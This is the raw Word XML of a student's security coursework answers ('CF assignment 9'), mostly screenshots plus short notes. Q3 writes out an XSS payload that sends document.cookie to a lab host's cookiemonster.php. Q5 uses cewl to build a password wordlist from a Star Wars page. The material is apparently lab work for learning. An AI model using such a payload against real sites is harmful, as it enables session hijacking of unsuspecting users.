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5A34B" w14:textId="0012AB0C" w:rsidR="003B4988" w:rsidRPr="003B4988" w:rsidRDefault="003B4988" w:rsidP="003B4988">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="003B4988">
        <w:t xml:space="preserve">CF assignment 9 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432179DE" w14:textId="694F2EE7" w:rsidR="003B4988" w:rsidRDefault="003B4988" w:rsidP="003B4988">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2019-5-26 15:25:55</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="62BBA2D7" w14:textId="7FF5F8AA" w:rsidR="003B4988" w:rsidRDefault="003B4988" w:rsidP="003B4988">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A1691850-Zheng (Rio)Yin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9B4741" w14:textId="77777777" w:rsidR="003B4988" w:rsidRDefault="003B4988"/>
    <w:p w14:paraId="008E4D78" w14:textId="741667DC" w:rsidR="00045E79" w:rsidRDefault="005F63F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B74391A" w14:textId="792FC9CC" w:rsidR="005F63F9" w:rsidRDefault="005F63F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C5FF49C" wp14:editId="5974D4DB">
            <wp:extent cx="5274310" cy="29273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5B19" w14:textId="18072406" w:rsidR="004E0E97" w:rsidRDefault="004E0E97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FDB7D8" w14:textId="1454B9E7" w:rsidR="004E0E97" w:rsidRDefault="00C35422">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DA2BF07" wp14:editId="5B60316B">
            <wp:extent cx="5274310" cy="246761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2ED3E" w14:textId="77777777" w:rsidR="004A40BF" w:rsidRDefault="00C35422">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="004A40BF" w:rsidRPr="004A40BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C9934" w14:textId="39F42BFB" w:rsidR="00C35422" w:rsidRDefault="004A40BF">
      <w:r w:rsidRPr="004A40BF">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t xml:space="preserve">='wrong' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t xml:space="preserve">='var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t xml:space="preserve">"); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>img.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>="http://10.8.0.13/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>cookiemonster.php?cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t xml:space="preserve">="+ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A40BF">
        <w:t>;'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67480875" w14:textId="51796D42" w:rsidR="004A40BF" w:rsidRDefault="004A40BF"/>
    <w:p w14:paraId="3A616760" w14:textId="1E1A1273" w:rsidR="004A40BF" w:rsidRDefault="004A40BF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04FCC053" wp14:editId="119862FC">
            <wp:extent cx="5274310" cy="27038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8264" w14:textId="57A916C8" w:rsidR="004A40BF" w:rsidRDefault="004A40BF"/>
    <w:p w14:paraId="0CDBD4C5" w14:textId="27D6EE4C" w:rsidR="004A40BF" w:rsidRDefault="004A40BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17729951" w14:textId="191CFD12" w:rsidR="004A0A4C" w:rsidRDefault="004A0A4C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22A301D7" wp14:editId="24BDFE71">
            <wp:extent cx="5274310" cy="20218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51B7" w14:textId="69ADA395" w:rsidR="004A0A4C" w:rsidRDefault="004A0A4C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="300BB0D4" wp14:editId="51B50E69">
            <wp:extent cx="5274310" cy="248221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98DA7" w14:textId="6E21D799" w:rsidR="00D61478" w:rsidRDefault="00D61478">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Oh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in this question we can’t </w:t>
      </w:r>
      <w:r w:rsidRPr="00D61478">
        <w:t>steal the session cookie</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E0A64" w14:textId="2B7D752F" w:rsidR="00D61478" w:rsidRDefault="00D61478">
      <w:r>
        <w:t>Ok….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705665E" w14:textId="06E67421" w:rsidR="00D61478" w:rsidRDefault="00D61478">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CCAF8C6" wp14:editId="53E4ADA5">
            <wp:extent cx="5274310" cy="27228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9F445" w14:textId="3E20499B" w:rsidR="00D61478" w:rsidRPr="00D61478" w:rsidRDefault="00D61478">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Still working in this way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B7B998" w14:textId="77777777" w:rsidR="00361BCD" w:rsidRDefault="00361BCD">
      <w:pPr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562F1B33" wp14:editId="670DA3F1">
            <wp:simplePos x="1145263" y="932507"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="1869541" cy="1151037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides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9541" cy="1151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F800E6" w14:textId="77777777" w:rsidR="00361BCD" w:rsidRPr="00361BCD" w:rsidRDefault="00361BCD" w:rsidP="00361BCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78479832" w14:textId="77777777" w:rsidR="00361BCD" w:rsidRPr="00361BCD" w:rsidRDefault="00361BCD" w:rsidP="00361BCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D02E4AD" w14:textId="77777777" w:rsidR="00361BCD" w:rsidRPr="00361BCD" w:rsidRDefault="00361BCD" w:rsidP="00361BCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB8F4F0" w14:textId="77777777" w:rsidR="00361BCD" w:rsidRDefault="00361BCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1812AD" w14:textId="630B90A5" w:rsidR="00361BCD" w:rsidRDefault="00361BCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B5B48" w14:textId="7F9FC5DC" w:rsidR="00361BCD" w:rsidRDefault="00ED57CD" w:rsidP="007C16F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F76774B" w14:textId="1F0A3835" w:rsidR="007C16F0" w:rsidRPr="00FA2565" w:rsidRDefault="007C16F0" w:rsidP="007C16F0">
      <w:pPr>
        <w:rPr>
          <w:strike/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA2565">
        <w:rPr>
          <w:strike/>
        </w:rPr>
        <w:t>cewl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA2565">
        <w:rPr>
          <w:strike/>
        </w:rPr>
        <w:t xml:space="preserve"> https://en.wikipedia.org/wiki/List_of_Star_Wars_characters -d=0 &gt;a.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661B0B44" w14:textId="5E860A99" w:rsidR="007C16F0" w:rsidRDefault="005A0CCA" w:rsidP="007C16F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575187C4" wp14:editId="2B304C0E">
            <wp:extent cx="5274310" cy="5559425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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5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DE55" w14:textId="3A029D72" w:rsidR="005C18A2" w:rsidRDefault="00335F80">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00335F80">
        <w:t>cewl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00335F80">
        <w:t xml:space="preserve"> -m 10 -d </w:t>
      </w:r>
      <w:r w:rsidR="00FA2565">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00335F80">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00FA2565" w:rsidRPr="00907E01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://wikivisually.com/wiki/List_of_Star_Wars_characters -w aa</w:t>
        </w:r>
        <w:r w:rsidR="00FA2565" w:rsidRPr="00907E01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00FA2565" w:rsidRPr="00907E01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="144617F0" w14:textId="153B983C" w:rsidR="00335F80" w:rsidRDefault="00335F80"/>
    <w:p w14:paraId="2A4BEBD2" w14:textId="79345789" w:rsidR="00E82F69" w:rsidRPr="00335F80" w:rsidRDefault="00090402">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680F199B" wp14:editId="29718244">
            <wp:extent cx="5274310" cy="221043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82F69" w:rsidRPr="00335F8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530493"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40F67E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71C5"/>
    <w:rsid w:val="00045E79"/>
    <w:rsid w:val="00090402"/>
    <w:rsid w:val="001B456A"/>
    <w:rsid w:val="00330878"/>
    <w:rsid w:val="00335F80"/>
    <w:rsid w:val="00361BCD"/>
    <w:rsid w:val="00390CE0"/>
    <w:rsid w:val="003B4988"/>
    <w:rsid w:val="003D71C5"/>
    <w:rsid w:val="004A0A4C"/>
    <w:rsid w:val="004A40BF"/>
    <w:rsid w:val="004E0E97"/>
    <w:rsid w:val="005A0CCA"/>
    <w:rsid w:val="005C18A2"/>
    <w:rsid w:val="005F63F9"/>
    <w:rsid w:val="007C16F0"/>
    <w:rsid w:val="00AB3B17"/>
    <w:rsid w:val="00C35422"/>
    <w:rsid w:val="00CE72C2"/>
    <w:rsid w:val="00D61478"/>
    <w:rsid w:val="00E82F69"/>
    <w:rsid w:val="00ED57CD"/>
    <w:rsid w:val="00FA2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5847F3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BEF094E9-63BE-4E41-88AE-FE6B79E91A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3B498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AB3B1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AB3B17"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Date"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B4988"/>
    <w:pPr>
      <w:ind w:leftChars="2500" w:left="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="日期 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="003B4988"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003B4988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3B4988"/>
    <w:rPr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wikivisually.com/wiki/List_of_Star_Wars_characters%20-w%20aa2.txt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1046</TotalTime>
  <Pages>4</Pages>
  <Words>87</Words>
  <Characters>497</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop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 Yin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>zheng Yin</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <cp:lastPrinted>2019-05-25T17:17:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-25T04:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-26T05:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>